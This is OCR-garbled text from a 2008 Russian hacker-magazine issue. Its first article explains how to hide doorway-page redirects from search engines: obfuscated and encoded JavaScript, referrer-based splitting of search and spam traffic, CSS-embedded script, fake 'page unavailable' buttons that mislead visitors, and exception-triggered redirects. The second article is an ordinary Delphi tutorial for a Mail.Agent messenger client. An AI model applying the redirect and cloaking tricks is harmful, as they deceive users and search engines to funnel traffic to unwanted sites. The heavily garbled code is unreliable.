зоватьЗОІ редирект: 

•для с клейки доменных имен сотрапѵ.сот и ѵѵѵѵѵѵ. со трапу, сот : 

• при смене домена; 

• при изменении адресов страниц. 

Редирект за номером 302, наоборот, используется в случае времен- 
ного изменения адреса страницы. Тогда все пузомерки остаются на 
старом адресе и вместе со страницей не переносятся. 

Техника классического редиректа сложностей не представляет. Всего су- 



300 — «МиШрІе СЬоісе» 

301 — «Моѵесі РегтапепНу» 

302 — «Роипсі» 



Н КЛАССИКА РЕДИРЕКТА 

Как обычно, сначала краткое введение для самых маленьких. Ты уже 
знаешь, что такое «дор» и с чем его едят. На всякий случай напомню, 
— это страница, оптимизированная под конкретный поисковый за- 
прос. Единственное назначение дора — выбиться втоп ЗЕРР’а. Чем 
выше позиция дора в выдаче, те мбольше трафик. Всясольвтом, 
чтобы привлекая трафик, сливать его на другой ресурс, например, на 
одну из многочисленных партнерок. 

Пользователь, зашедший на страницу дора через выдачу поисковика, 
должен быть автоматически переброшен на нужный нам сайт. Этот важный 
момент и осуществляется, как раз, с помощью редиректа. 

Держу пари, что со словом «редирект» у большинства начинающих 
веб-мастеров и поисковых оптимизаторов ассоциируется сценарий 
на языке ЭаѵаЗсгірІ, перенаправляющий браузер на другую страницу. 
Так вот, на деле, это всеголишь обертка для базовых механизмов реди- 
ректа, реализованных на уровне НТТР-протокола. На дискеты найдешь 
полный текст РЕС 2068, в котором описан механизм редиректа. Согласно 
это му документу, для инициализации редиректа используются трехзначные 
коды, начинающиеся стройки (3**). Втекущей редакции протокола НТТР 
1.1 определены следующие разновидности редиректа: 



► 094 



ХАКЕР 08 /116/ 08 










ществует четыре способа продать душу серфера на сторону: редиректчерез 
мета -тег «ПеІгезЬ», редиректс помощью ЧаѵаЗсгірі, редирект средства ми 
РНР и редиректчерез .Ыассезз. На врезке ты найдешь примеры всехтипов 
редиректа. 

РЕДИРЕКТ С ИСПОЛЬЗОВАНИЕМ РЕРРЕ5Н 

стеРа кРРр-едиіѵ= ' КеРРезк ' сопРепР= ' 0 ; 
иг 1 =кРРр : / /тяы . хакер . ги> 

РЕДИРЕКТ С ПОМОЩЬЮ МѴА5СКІРТ 

<зсгірр Руре= " РехР / з аѵазсгірр " > 

<!-- 

міпбочлп ІосаРіоп = "кРРр :/ /шт. хакер . ги" ; 

//--> 

</зсгірР> 

РЕДИРЕКТ С ПОМОЩЬЮ РНР 

<?ркр 

кеабег ( " ЬосаРіоп : кРРр :/ /ѵшя. хакер . ги" , Ргие, 3 01); 

?> 

// Или 
<?ркр 

кеабег ( " ЬосаРіоп: кРРр: //шт. хакер, ги" , Ргие, 302); 

?> 

РЕДИРЕКТ ЧЕРЕЗ .НТАССЕ55 

КебігесР 3 01 / кРРр :/ /шт. хакер . ги 
// Или 

КебігесР 3 02 / кРРр :/ /шт. хакер . ги 

Чуть было не забыл про один важный момент! Еслиты используешь реди- 
рект на стороне клиента, и весь механизм редиректа находится в НТМб-до- 
кументе.то из списка разновидностей тебе доступен только 302 редирект. 

Н 5Е0Ѵ5.5Е. РАУНД 1 

Самый простой способ спрятать редирект— придать ему вид полезного 
іаѵазсгірксценария, добавив немного примитивной логики. 

<зсгірр> 
ѵаг1=1 ; 
ѵаг2=ѵаг1 ; 

ІР ( ѵаг1==ѵаг2 ) 

боситепР . ІосаРіоп = "кРРр :/ /члплплп хакер . ги" ; 

</зсгірР> 

Поисковый робот, индексируя страницу, анализирует ее по ряду пара- 
метров. Процесс включает в себя несколько этапов, — в зависимости от 
содержимого страницы и ряда других факторов. В частности, если робот 
встречает среди НТМЕ-кода тег<8СК1РТ>, то исследуется сценарий, 
следующий за этим тегом. В дискуссии, анализируют или нет поискови- 
ки ЗаѵаЗсгірІ-сценарии, давно поставлена жирная точка — да, анализи- 
руют. Вопрос в том, как они это делают. Естественно, анализатор робота 
знаком с операторами и правилами построения ЗаѵаЗсгірІ-выражений. 

И если ему встретится выражение типа боситепР . 1осаРіоп=кРРр : // 
шт. хакер . ги, он сразу заподозрит, что здесь что-то не чисто. 

Сам по себе редирект вполне безобиден, иначе йОМ атрибут ІосаРіоп 
не был бы доступен веб-программистам. В конце концов, мы можем 
перенаправлять посетителей на разные версии сайта в зависимости от 
языка браузера или ІР-адреса. Малоли подобных ситуаций! А разтак, 
то должна присутствовать некая логика — критерии, в соответствии с 
которыми редиректлибо применяется, либо нет. Встретив на своем пути 
условный оператор, анализатор не в состоянии понять смысл проверяе- 
мого выражения. Единственный вывод, который может сделать анализа- 
тор ЗаѵаЗсгірксценария: то, что редиректсрабатывает не всегда, атолько 
при выполнении некоторого условия. Вот та к, казалось бы, дубовый прием 
позволяет защитить редирект от бана. 



Другой способ заключается втом, чтобы скрыть от поискового робота 
содержимое сценария, зашифровав его. Рассмотрим в качестве примера 
исходник НТМЕ-формы, шифрующей ЗаѵаЗсгірР 

ШИФРУЕМ МѴА5СВІРТ 

<сепРегхРогт пате=сопѵ_Рогт> 

<РехРагеа пате=згс_Ьехк со1з = 80 гоѵ^з = 10 шгар=ѵігкиа1> 
</кехкагеа><Ьг> 

<іприк Цуре=ЬиРРоп опс1іск= " Разке ( ) ; " ѵа1ие= " вставить 
из буфера &иагг ; "> 

<іприк куре=Ьиккоп опс1іск= " Собе ( ) ; гекигп 0; " 
ѵа1ие= " зашифровать &багг; "> 

<іприк Руре=ЬиРкоп опс1іск= " Сору ( ) ; " ѵа1ие= " копировать 
&с1агг ; " > 

<іприб куре=ЬикРоп опс1іск= " СІеагРогш ( ) ; гекигп 0; " 
ѵа1ие = " очистить &багг ; &иагг ; " ><Ьг> 

<Рехкагеа пате = сіе зР_Ьехк со1з = 80 гоѵ^з = 10 
ѵ7гар=ѵігкиа1х/кехкагеах/^огтх/сепІ:ег> 

<зсгірк ЬАКСІІАСЕ= " баѵаЗсгірк " > 

Іипскіоп СІеагРогш () 

{ 

боситепк . сопѵ_1огт. безР_Рехк . ѵа1ие=" " ; 
боситепк . сопѵ_Рогт. згс_РехР . ѵа1ие=" " ; 
боситепР . сопѵ_Рогт. згс_РехР . Росиз ( ) ; 

} 

РипсРіоп РазРе() //вставка в форму из буфера 

{ 

боситепР . сопѵ_Рогт. згс_РехР . 
сгеаРеТехРКапде ( ) . ехесСоттапб ( " РазРе " ) ; 
боситепР . сопѵ_Рогт. згс_РехР . 

Росиз ( ) ; 

} 

РипсРіоп Сору ( ) //копирование из формы 

{ 

боситепР . сопѵ_Рогт. безР_РехР . 
сгеаРеТехРКапде ( ) . ехесСоттапб ( "Сору" ) ; 
боситепР . сопѵ_Рогт. безР_РехР . Росиз ( ) ; 

} 

РипсРіоп Собе ( ) 

{ 

ѵаг Ретр= " " , і , 1 , с=0 , оиР= " " ; 

ѵаг зРг=боситепР . сопѵ_Рогт. згс_РехР .ѵаіие; 

1 = 0; 

ІР (зРг== " " ) геРигп; 

\ѵкі1е ( 1<=зРг . ІепдРк-1 ) 

{ 

оиР=оиР+зРг . скагСобеАР ( 1 ) + ' ! 1 ; 

1 + + ; 

} 

боситепР . сопѵ_Рогт. безР_РехР . ѵа1ие= 

"<зсгірр>ѵаг Ретр=\ " \ " , і , с=0 , оиР=\ " \ " ; ѵаг зРг=\ 

" " +оиР+ " \ " ; 1 = зРг . ІепдРк; ѵ/кііе (с< = зРг . ІепдРЬ- 
1 ) {ѵ/кііе ( зРг . скагАР (с ) ! =\ ' 1 \ ' ) Ретр= 

Ретр+зРг . скагАР ( с++ ) ; с++ ; оиР= 
оиР+8Ргіпд . РготСкагСобе (Ретр) ; Ретр=\ " \ " ; } 
боситепР .ѵпгіРе (оиР) ;<\/зсгірР>" ; 

} 

</8СКІРТ> 

Ни в коем случае не стоит этот прием считать полноценным шифрованием! 
Мы всего л ишь заменяем каждый символ сценария соответствующим ему 
числовым значением изтекущей кодовой страницы. 

Теперь о грустном. Перечисленные выше способы сокрытия редиректа, 
мягко говоря, не идеальны. Прежде всего, это связано стем, что поиско- 
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Мы не нарушаем 
нашихтрадиций — 
на дискеты найдешь 
упомянутый в статье 
софт. 



вые системы постоянно развиваются. Миржесток, гринго 

— сегодня поисковики нетолько анализируютсценарии, но и 
исполняют их, моделируя стандартное окружение веб-браузе- 
ра. Апосему, вся наша притянутая зауши программная логика 
и, особенно, кодирование сценария, идут лесом. Аминь. 

Н 5Е0 Ѵ5. 5Е. РАУНД 2 

Поисковики объявили войну быстрому редиректу. Не остается 
ничего, кроме как принять вызов. В качестве ответного хода 
напрашивается фильтрация поискового трафика. Пользова- 
телям, зашедшим по ссылке с поисковой выдачи, мы будем 
показывать контентбез редиректа, а тех, кто пришел через 
ссылки, которыми мы проспамили гостевухи, форумы, блоги, 

— безжалостно редиректим. 

Реализовать та кую логику на ^ѵаЗсгірІ — как два байта об 
асфальт! 

Создаем массив с перечислением всех известных поисковых 
систем. Затем в БОМ-структуре читаем свойство боситепб 
геіюггег — определяем, откуда к нам пришел пользователь. 
Прогоняя через цикл наш массив, сравниваем его элементы с 
текущим значением сіоситепб . гебеггег. Все, теперь оста- 
лосьтолько разрулить поисковый и ссылочныйтрафик. Какэто 
может быть реализовано, смотри ниже: 



<зсгірб> 

ѵаг геб; ѵаг і; ѵаг із_зе; 
ѵаг зе = пем Аггау ( 1 доодіе ' , ' шзп 1 , ' уабюо 1 
, ' уапсіех 1 , 1 гатЫег ' , ' арогб ' , ' таіі ' , 1 кт. 
т 1 , ' теба' , ' аІІ.Ьу' , 1 биб.Ъу' , 'опііпе. 
иа ' , ' підта ' ) ; 

іб (сіоситепб . гебеггег) геб=с!оситепб . гебеггег; 



Альтернатива 

редиректу 

В некоторых случаях вместо использования редиректа можно прибегнуть к 
технологии клоакинга (С1оакіп§), когда поисковому роботу показывается одна 
страница, а живому пользователю — совершенно другая. Клоакинг, также, как 
и редирект, отлично распознается поисковиками, и его маскировка опять же 
требует нестандартных подходов. Более того, если использование редиректа 
иногда может быть оправдано, то клоакинг — однозначно черная оптимизация, 
а значит, бан. 



еізе геб= " " ; 

бог ( і=0 ; і<13 ; і++) { 

іб (геб . іпсІехОб (зе [і] ) >=0) {Іосабіоп. 
геріасе ( "урл для поискового трафа) ; } 

} 

іб ( із_зе==0 ) { Іосабіоп . геріасе ( "урл для слива 
левого трафа" ) ; } 

</зсгірб> 

А как насчет идеи замутить редирект на С55? Большинство 
поисковиков игнорируют элементы оформления страницы, 
обращая вниманиетолько на контент. 

Идея проста до безобразия. Редирект будет осуществляться 
с помощьютогоже сценария на баѵаЗсгірб Воттолько сам 
сценарий мы уберем подальше — например, в 055-файл . Для 
этого воспользуемся тем, что любой 055-объект поддерживает 
такой атрибут, как ІІПЕ. В свою очередь, атрибут ІІРБ выступает 
в качестве обертки для некоторых дополнительных свойств, в 
частности — «з аѵазсгірб». 

В результате, становится доступным такой воттрюк: 

Ббші { 

Ьаскдгоипсі-ітаде : игі ( 

3 аѵазсгірб : сіоситепб . 1осабіоп= 

" ъплП л 7 . хххсіо 1 1 з . с от " ) ; 

} 

Оп-па! Якобы устанавливая фон страницы, мы вероломно 
посылаем юзверя полюбоваться почти одетыми девочками. 

0 5Е0Ѵ5.5Е. РАУНД 3 

Осилив все, о чем я пытался тебе рассказать в этой статье, 
ты неизбежно придешь к выводу, что создать правильный 
редирект, который не палится поисковиками, нетак-то и легко. 
Есть ли выход? Спешутебя обрадовать, да. Он одновременно 
потрясающе прост и потрясающе сложен. Тебе понадобится 
проявить фантазию и быть нестандартным. Постоянно ищи но- 
вые пути и тестируй их на практике. И ты всегда будешь на один 
шагвпереди поисковиков. Твои доры будутчастыми гостями в 
топе поисковой выдачи. Поясню на примере. 

Чаще всего, говоря о редиректе, подразумеваютавтомати- 
ческий редирект. Но кто сказал, что это должен быть именно 
автоматический редирект? Пусть юзер сам уходит на целевой 
ресурс, нажав на кнопку веб-формы. Какзаставить его это 
сделать — другой вопрос. Вариантов много, приведулишь 
несколько: 
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Тулза, умеющая шифровать нетолько іаѵаЗсгірІ:, но и весь 
НТМЬ-код 



д — превосходный инструмент для отладки ^ѵаЗсгірІ 



1. Использовавтехнологию клоакинга, подсовывать поиско- 
вику заряженную ключевиками страницу, а серферу сообщать 
что-нибудь вроде — «Страница временно недоступна. Для 
возврата к предыдущей странице нажмите О К». Понятно, что 
нажатие на кнопку переброситего совсем нетуда, куда он рас- 
считывал попасть. Кстати говоря, такой тип редиректа очень 
подходит при работе с Абіііі:- ресурса ми. Достаточно просто 
разместить на странице с дором стандартный дискламбер «Да, 
мнебольше Іблет». И это не вызовет никакого подозрения, 
особенно если в результате в окне браузера откроется страни- 
ца сзаветной клубничкой. 

2. Можно обойтись и вовсе без клоакинга, просто прокручивая 
страницу вниз и пряча от юзера контент, предназначенный для 
поисковых систем. В зоне видимости оставляем только форму 
с кнопкой. 

Вот тебе еще пища к размышлению. Анализатор поискового 
робота если и исполняетскрипты, то делаетэто в режиме 
СобеРІоѵѵ. То есть, делаетэто линейно. Но ничто не мешает нам 
написать интерактивный скрипт, реагирующий на какое-либо 
действие, выполняемое пользователем, например, на переме- 
щение курсора, и, соответственно, исполняющий скриптпри 
возникновении заданного события. 

Идем дальше. Редирект можно замаскировать под обработку 
исключительных ситуаций: 

Огу{ 

йосшпепЦ . деДЕІетепДВуІсІ ( "ЬОпІ " ) ; 

} саЦсД (е) { 



Яндекс- 

фильтры 

Непот-фильтр. Накладывается за ссылочный спам, за 
продажу ссылок с сайтов, за неестественные ссылки. 
Фильтр накладывается как на отдельные ссылки на 
странице, так и на весь сайт в целом. 
ЕхсеесШепзіІуКеуѵѵогсІз. Накладывается на страницы, 
содержащие слишком большую плотность ключевых 
слов или фраз (норма — 5-7%) . 

Редирект-фильтр. Накладывается за использование 
) аѵазсгірВредиректов . Автоматически отлавливает 
сайты и не пропускает их в индекс. 

Фильтр «ты последний». Накладывается на страницу, 
которая имеет дубль в индексе. 

ІлпкзТехІ:. Накладывается на сайты, в контексте и в 
заголовке которых нет поискового запроса. 



ДосшпепЦ . 1осаДіоп= "ѵѵѵлѵ. хххйоііз . сот" ; 

} 

Приведенный код, будучи расположенным в секции <НЕА0>, 
попытается обратиться к йОМ-элементу Ьіпі . А поскольку до- 
кумент еще не загружен в браузер полностью, такого элемента 
еще не существует. В итоге будетсгенерировано исключение, 
которое мы и отлавливаем. Адальше — банально сливаем 
трафик. 

Еще один нестандартный способ — воспользоваться трасто- 
выми доменами, к которым у того же бооді’а определенный 
кредит доверия. Например, такие крупнейшие системы, как 
Ата 20 п и ЕЬау позволяютсвоим клиентам в рамках профай- 
ла загружать небольшие файлы. Оформив редирект в виде 
внешнего дв-файла и разместив его на таком портале, можно 
заставить поисковик поверить вто, что это скрипт партнерской 
программы. 

И все это —только верхушка огромного айсберга. Чем менее 
стандартна будеттвоя идея, тем выше шансы обхитрить 
поисковик. 

0 РОЖДЕННЫЙ УМЕРЕТЬ 

Как видишь, способов слить трафик на сторону существует 
достаточно много. Но, к сожалению, все они не гарантируют 
1 00%-ной работоспособности. Причина в самой природе 
дора. Просто прими это как данность — если твой дор за ба- 
нен, то это не потому, что ты где-то допустил ошибку. Все, что 
ты можешь сделать с помощью хитрых финтов ушами, это от- 
срочить неприятный момент вылета дора из выдачи. Просто 
поставь себя на место разработчиков любой поисковой 
системы. Веб-сайт, появившийся из ниоткуда и момен- 
тально взлетевший в топ, не может не вызвать подозрений. 
Неизбежна модерация, то есть проверка веб-сайта уже не 
роботом, а человеком. Сам факт переброса пользователя 
на другой ресурс, какой бы хитрый редиректты ни исполь- 
зовал, выдасттебя со всеми потрохами. И, конечноже, не 
стоит сбрасывать со счетов обычного серфера, который 
можетэлементарно настучать на тебя в саппорт поисковой 
системы. 

Накопленный богатый опыт поисковой оптимизации, к 
которому ты можешь обратиться через многочисленные 
5 Е0- фо ру мы и личные сетевые дневники оптимизаторов, 
позволяет выработать наиболее оптимальную стратегию 
дороводства. Сделал сотню-другую доров, позаботился о 
том, чтобы поисковики спалили их как можно позже, залил 
на хостинг, проспамил и... забыл. Создавай новую партию и 
снова, по кругу. Чем ответственнее ты подойдешь кзащите 
дора, в частности, к сокрытию механизма редиректа, тем 
дольше твои дор ы провисят вЗЕРР’е.Тем больше бабла ты 
поднимешь. =Н= 




> Ііпкз 

• ѵѵѵѵѵѵ.итахіогит. 
сот — читай и придет 
просветление. 

• ШрУ/ги.ѵѵікіресІіа. 
огд/ѵѵікі/Дорвей 

— ѴѴІкіресІіа о дорвеях. 

• ЬирѴ/ѵѵѵѵѵѵ.хакер. 
ги/тадаДпе/ха/І 03/ 

— куда лить трафик? 
Ответ — в статье 
Леонида «РОІсІ» 
Стройкова. 

• (огит.діаѵтесі.сот 

— еще один форум, но 
под эгидой уже другой 
партнерки. 

• ѵѵѵѵѵѵ.кіікіогит.сот 

— форум, также до- 
стойный внимания. 




> \ПІО 

Помни, что используя 
редирект для слива 
трафика, ты играешь 
на грани фола и в 
любой момент можешь 
схлопотать бан от 
поисковика. 



ХАКЕР 08 /116/ 08 



► 097 






/ АЫТОЫОѴ.ІСОП.КНѴ@СМАІІ..СОМ / 



СНОШЕНИЯ 
СУПЕРАГЕНТОМ 



КОДИМ ПРАВИЛЬНЫМ МАІІ_.А6ЕІМТ 



[ 



• і -і 



У всеми любимой тети аси давно появился русский клон — «Май. Агент». 

I Ш ~~ ^ 

Не буду спорить, по популя рности аська все еще впереди. Но уже сейчас по- 
нятно, что Май. агента ждет большое будущее. А раз так, ты не должен 
герять времени з^я^— усаживайся поудобнее и приготовься постичь тонкос- 
ти программирования мессенжера нового поколения. 



ѵшрования мес 

ЙІ 17 



ИГОРЬ АНТОНОВ 



г ПЛАН ДЕЙСТВИЙ 

Какты понимаешь, МаіІ.АдепІ — это обычная сетевая программа, которая 
использует протокол поверхТСР/ІР. Отсюда вывод: чтобы создать своего 
клиента, необходимо хорошенько раскурить этот протокол, выбрать способ 
реализации сетевой части и написать пару десятков строчек кода. По 
первому критерию все должно быть ясно, а вот на втором стоит остановить- 
ся. Ты уже, наверняка, в курсе, что на ОеІрЫ закодить любое приложение 
можно используя, минимум, дветехнологии: с помощью готовых классов 
и ѴѴІпАРІ -функций. Первый вариант зачастую проще, но зато второй 
— интересней. Вдобавокон позволяет понять принципы работы ОС. Для 
написания сетевых приложений в ѴѴІпсІоѵѵз есть целый набор сетевых 
функций — ѴѴІпзоск АРІ. Про нихяуже писал много раз и еще раз писать 
одно и тоже просто не хочется. Поэтому мы рассмотрим готовый и, главное, 
универсальный компонент для работы с протоколом ММР, а исходник 
примера с реализацией на чистом ѴѴіпБоск АРІ ты сможешь скачать со всем 
известного ѵѵѵѵѵѵ.ѵг-опііпе.ги . 

Н ТМКІМ — БЫСТРЫЙ ПУТЬ В НИРВАНУ 

ОеІрЬІ- программ исты обычно на шаг впереди своих сишных коллег. Этот 
случай не исключение. Наш соотечественникАлексей Панов позаботил- 
ся обо всех нас и закодил отличный компонент для комфортной работы с 
протоколом ММР. 

Н СВОЙСТВА ПРОТОКОЛА ММР 

АсйѵеАпйБрат (Ьооіеап) — активация антиспамовой системы. 
АпйБратѴѴогсіз (зігіпд) — в этом свойстве записываются слова, которые 
будут идентифицироваться какспам. Внеси сюда: «порно, секс, недорого, 
только у нас» и сможешь временно забыть о проблеме нежелательной 
корреспонденции, которой так много летает по протоколу ММР. 

Іодіп (зігіпд) — логин в системе таіі.ги.то есть твой ящик в любом из доме- 



нов, принадлежащих серверу таіі.ги (Ьк.ги, Іізі.ги, іпбох.ги). 

ІодіпБіаіиз (іпіедег) — статус пользователя. В свойстве устанавливается 
один из возможных статусов (онлайн, невидимый ит.д.). Некоторые из 
доступных вариантов: 

ЗТАТПЗ_ОЫЪШЕ - онлайн 

ЗТАТТЦ 8_АШАУ — отошел (нет на месте) 

ЗТАТиЗ_РЬАС_іт/ІЗІВЬЕ - флаг невидимости. 

Этот флаг нужно использовать, как правило, со ЗТАТГІ8_ 
ОЖ-ШЕ . 

Іодіп_5 сіезс (зігіпд) — дополнительное описаниетекущего состояния. 

Как правило, сюда пишут«готов поболтать» или что-то в этом роде, 
раззѵѵогсі (зігіпд) — пароль на указанный в свойстве Іодіп аккаунт. 

г события 

ОпАсісІМеѵѵСопіасІ: — событие возникает при добавлении нового контакта. 
ОпАиіЬАск — возникает при получении ответа об авторизации. 

ОпАиіНРед — событие срабатывает при запросе авторизации. Во время 
реакции на это событие хорошо бы показывать форму с информацией о 
пользователе, запросившем авторизацию. В качестве информации приня- 
то показывать: ник пользователя, е-таіі итекстзапроса на авторизацию. 
ОпСотрозеЕѵепі — событие происходит при начале какого-либо действия 
со стороны удаленного пользователя. Например, при генерации этого 
события ты можешьузнать, что удаленный пользователь начал печатать 
тебе сообщение. 

ОпСоппесІРгодгезз — событие срабатывает при попытке соединения 
ссервером МаіІ.Адепі. С помощью этого событияты сможешь инфор- 
мировать пользователя о текущем состоянии подключения. Например, 
можно установить на формеТРгодгеззВаги отображать на нем прогресс 
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подключения. Кстати, именноэтой простой фишки лишен МаіІ.Адепі, так 
что — наматывай на ус (А нафига это надо? — Прим. ред.). 

Опйізсоппесі: — дисконнектон и в Африке дисконнект. 

ОпбеІРіІе — информируето приемефайла от контакта. 

ОпІ_із* — возникает при получении списка контактов. 

ОпІ_ізШрсІа*е — происходит при обновлении контактов. 

ОпІ_одіпІггіо — срабатывает во время подключения ксерверу. Например, 
если не получилось подключиться из-за неправильно введенных данных 
(логин, пароль), то тут это можно обработать. 

ОпМеІггіо — событие возникает при получении информации отвоем аккаунте. 
ОпМеззаде — событие генерируется во время получения очередного 
сообщения. 

ОпМуБегѵісезМеззаде — при получении сервисных сообщений будет 
генерировать это событие. 

ОпМеѵѵМаіІ — событие возникает в момент прихода в твой почтовый ящик 
новой корреспонденции. 

ОпРесѵМогтаІАѵаІаг — событие возникает во время приема аватары 
контакта. Здесь можешь написать код для обновления аватары у нужного 
контакта. 

ОпРесѵБтаІІАѵаІаг — по сути, то же самое, что и предыдущее, за исключе- 
ниемтипа аватары. Событие возникаетпри приеме маленькой аватары. 
0п5есопсЛ_одіп — событие сигнализируето неприятном известии: под 
твоим логином кто-то вошел. Во время возникновения этого события нужно 
поднимать тревогу и убеждать пользователя скорее сменить пароль. 
0п5*а*из — событие возникает при изменении каким-нибудь контактом 
своего статуса. 

ОпизегБеагсНРезіШ — событие генерируется при получении результатов 
поиска. 



• 1 компонент ТМаіпМепи 

• 1 ТІтадеЬізЬ 

• 1 ТМгіш 

• 1 ТЬізДѴіехѵ 

• 1 ТРгодгеззВаг 

По всей форме я растянул компоненттьізьѵіечлг В нем будет отображать- 
ся контакт-лист. Чтобы контакты не смотрелись серо и убого, я подобрал 
в тітадеЬізЬ картинки, соответствующие возможным статусам пользо- 
вателей (Опііпе, Аѵѵау, ОШіпе ит.д.). С помощью компонента ТМаіпМепи 
я создал основное меню из следующих пунктов: подключить, отключить, 
выбор статуса (онлайн, отошел, невидимый). Готовый вид моей формы ты 
можешьувидеть на рисунке. 

На этом о форме можно забыть и приступить к кодингу. Первым делом 
научимся устанавливать и разрывать соединение с сервером. Для этого 
создай обработчиксобытия ОпСІіскдля кнопки с именем «Подключить» и 
напиши в нем: 

Іі Рогш2 . ЗЬсжМосІаІ = шгСапсеІ ТЪ.еп 
ЕхіЬ; 

СоппесЬВаг . ѴізіЫе := Ьгие; 

МаіІАдепВ . Ьодіп := Еогт2 . ЬодіпЕсІіЬ . ТехЬ ; 

МаіІАдепВ . Раззтлгогсі := Рогш2 . РаззЕсІіВ . ТехВ ; 

МаіІАдепЕ . ЬодіпЗЬаЬиз := ЗТАТЬЗ_(ЖЬШЕ ; 

МаіІАдепЕ . 1одіп_з сіезс := 'Я в сети! ! ! 1 ; 

МаіІАдепЕ . СоппесЕ2 (МаіІАдепВ . Ьодіп, МаіІАдепВ. 

Раззтлгогсі) ; 



Н ПРАКТИКА 



Толку отнеподкрепленной практикойтеории мало. Поэтому запусти ОеІрЫ и 
приготовься кодить. Какобычно, сразу после запуска ОеІрЫ создаст новый 
пустой проект. Закрой его и загляни на наш 0Ѵ0. Там тебя ждет компонент 
ТМПІт. Скопируй его на винт и за и нетал ь к своему ОІерЫ. Компонент уста- 
навливается стандартным способом через Сотропепі -> Іпзіаіі СотропепЬ 
Установив компонент, создай новый проекти накидай на форму следующие 
компоненты: 



Перед тем, как начать попытку подключения, я модально показываю Рогт2 
(смотри рисунок). На этой форме расположены два поля ввода, в которые 
нужно ввести имя пользователя и пароль. Если пароль и имя пользователя 
введены успешного можно начинать первую попытку соединения. Для 
этого я заполняю все необходимые свойства компонента тмгіш(уменя он 
носитимя МаіІАдепі). Послетого, как все поля заполнены, можновыпол- 
нить метод СоппесЬ2. 
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Продвинутый 
интерфейс 
с помощью одной 
функции 

ргосесіиге ТРогтІ . СгеакеМеѵ/ТаЬ ( 

изег_ешаі1: зкгіпд; кехк : зкгіпд) ; 
ѵаг 

_ЫемТаЬ : ТТаЬЗЬеек; 

_Ыеѵ7ТехРМешо , „ЫетлгСЬакМето : ТМешо ; 
і : іпкедег; 

Ьедіп 

ког і : = 0 ко когтЗ . РадеСопкгоІІ . РадеСоипк-1 Бо 
ік когтЗ . РадеСопкгоІІ . Радез [і] . Саркіоп = 
изег_піск кЬеп 
Ьедіп 

когтЗ . РадеСопкгоІІ .АскіѵеРадеІпсіех := і; 
ік Техк о ' ' кЬеп 

ТМешо (РогшЗ . РадеСопкгоІІ . Радез [і] . 
РіпсІСотропепк (СЬакМето+ІпкТоЗкг ( і+1 ) ) ) . 

Ьіпез . Асісі (из ег_піск + 1 : ' + кехк) ; 
когтЗ . ЗЬкж; 

Ехік; 

епсі; 

_Меѵ/ТаЬ := ТТаЬЗЬеек.Сгеаке(когтЗ.РадеСопкгоІІ); 
_Ыеѵ/ГаЬ. Саркіоп :=изег_піск; 

_Ыеѵ^ТаЬ . Ыаше := ' ТаЬ 1 +ІпкТоЗкг 
( когтЗ . РадеСопкгоІІ . РадеСоипк ) ; 

_Ыеѵ^ТаЬ . РадеСопкгоІ ; = когтЗ . РадеСопкгоІІ ; 
_МемСЬакМешо : = ТМешо . Сгеаке ( ДМемТаЬ) ; 
_Меѵ7СЬакМешо . Ыаше := ' СЬакМето ' +ІпкТоЗкг ( 

РогшЗ . РадеСопкгоІІ . РадеСоипк) ; 

_МемСЬакМешо . Аіідп := аІТор; 

_МеѵтТаЬ. ІпзегкСопкгоІ (_МемСЬакМешо) ; 
_Неѵ/ГехкМето : = ТМешо . Сгеаке (_Ыеѵ^ТаЬ) ; 
_Меѵ/ТехкМето . Бате := 1 ТехкМето ' + ІпкТоЗкг ( 
когшЗ . РадеСопкгоІІ . РадеСоипк) ; 

_Ыеѵ^ТехкМешо . Аіідп := аІТор; 

_Ыеѵ^ТаЬ. ІпзегкСопкгоІ (_Меѵ^ТехкМешо) ; 
_МемСЬакМето . Ьіпез . Сіеаг ; 

__МемТехкМешо . Ьіпез . Сіеаг ; 

Ік Техк о ' ' ТЬеп 

_МемСЬакМето . Ьіпез . АсЫ (из ег_піск + 1 : 1 + кехк) ; 

РогшЗ . РадеСопкгоІІ . АскіѵеРаде := _ЫеілгТаЬ; 

РогшЗ . Зкюхѵ; 
епсі; 




Лвіарчіация 




^ €- _ ин . Іівеі_Іе5(_200В_2@™і.ш 

■ ■ я і я в 
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Пароль: 



і 4 + + I- У 



Ок 



Отмене 



Элегантная форма запроса логина и пароля 



Процесс подключения запущен. Было бы неплохо иметь возможность от- 
следить его текущее состояние на РгодгеззВаг. Создай для компонента 
ТМгішобработчиксобытия ОпСоппескРгодгезз и напиши в нем: 

СоппескВаг . Розікіоп := Зкаке; 

Ік Зкаке = 100 ТЬеп Ьедіп 
Зіеер ( 100 ) ; 

СоппескВаг .ѴізіЫе := каізе; 
епЬ; 

Думаю, пояснять этот код нетсмысла. Сложного в нем абсолютно ничего. 
Двигаемся дальше. С подключением разобрались, теперь нужно позабо- 
титься о заполнении контакт-листа. Тебе уже известно, что получение спис- 
ка контактов происходит при возникновении события ОпЫзк-компонента 
ТМгіш, а разтак — создай обработчиксобытия ОпЬізк и напиши в нем 
всего лишьдве строчки кода: 

_СопкаскЬізк :=Ьізк; 

СекЬзегЬізк ( ) ; 

В первой строчке кода я получаю в переменную_СопкаскЬізк (объяв- 
лена как глобальная переменнаятипа АСопкаск_Ьізк] ссылку на весь 
список контактов (ьізк]. Послетого, какссылка получена, я обращаюсь к 
самописной процедуре СекЬзегЬізк ( ) , код которой ты можешьувидеть 
на соответствующей врезке. 



Получаем индекс 

статусной 

картинки 



кипскіоп ТРогшІ . СекЗкакизІшаде ( зкакиз : іпкедег; 
аЬѵЗкакизіЬ: зкгіпд) : іпкедег; 

Ьедіп 

Кезиік : = 1 ; 

Сазе Зкакиз Ок 
ЗТАТІІЗ_(ЖЫМЕ : Кезиік := 0; 

ЗТАТЬЗ-ОРРЬШЕ : Кезиік :=1; 

ЗТАТЬЗ_АѴ/АУ : Кезиік :=2; 

ЗТАТЬЗ_РЬАС_ШѴІЗІВЬЕ : Кезиік := 5; 
ЗТАТІІЗ_ЬЗЕК_ВЕРШЕВ : 

Ьедіп 

ік асІѵЗкакизІсІ = ' зкакиз_сЬак 1 кЬеп Кезиік := 3; 
ік аЬѵЗкакизіЬ = ' зкакиз_ЬпЬ ' кЬеп Кезиік := 4; 



► юо 



епЬ; 

епЬ; 

епЬ; 
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Тестируем клиента 

Клиент готов, теперь самое время его хорошенько протестировать. Я 
специально завел пару аккаунтов на таіі.ги : один для только что испе- 
ченного нами клиента (изег_і;е5і;_2008@таі1.ги), а второй — для Маіі. 
А§еп1;а (изег_і:е5*_2009@таі1.ги). Оба клиента успешно соединились 
с сервером и обменялись несколькими сообщениями. Результат ты 
можешь увидеть на рисунках (с соответствующими подписями) . 



1 , . 
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Стороны обменялисьсообщениями 




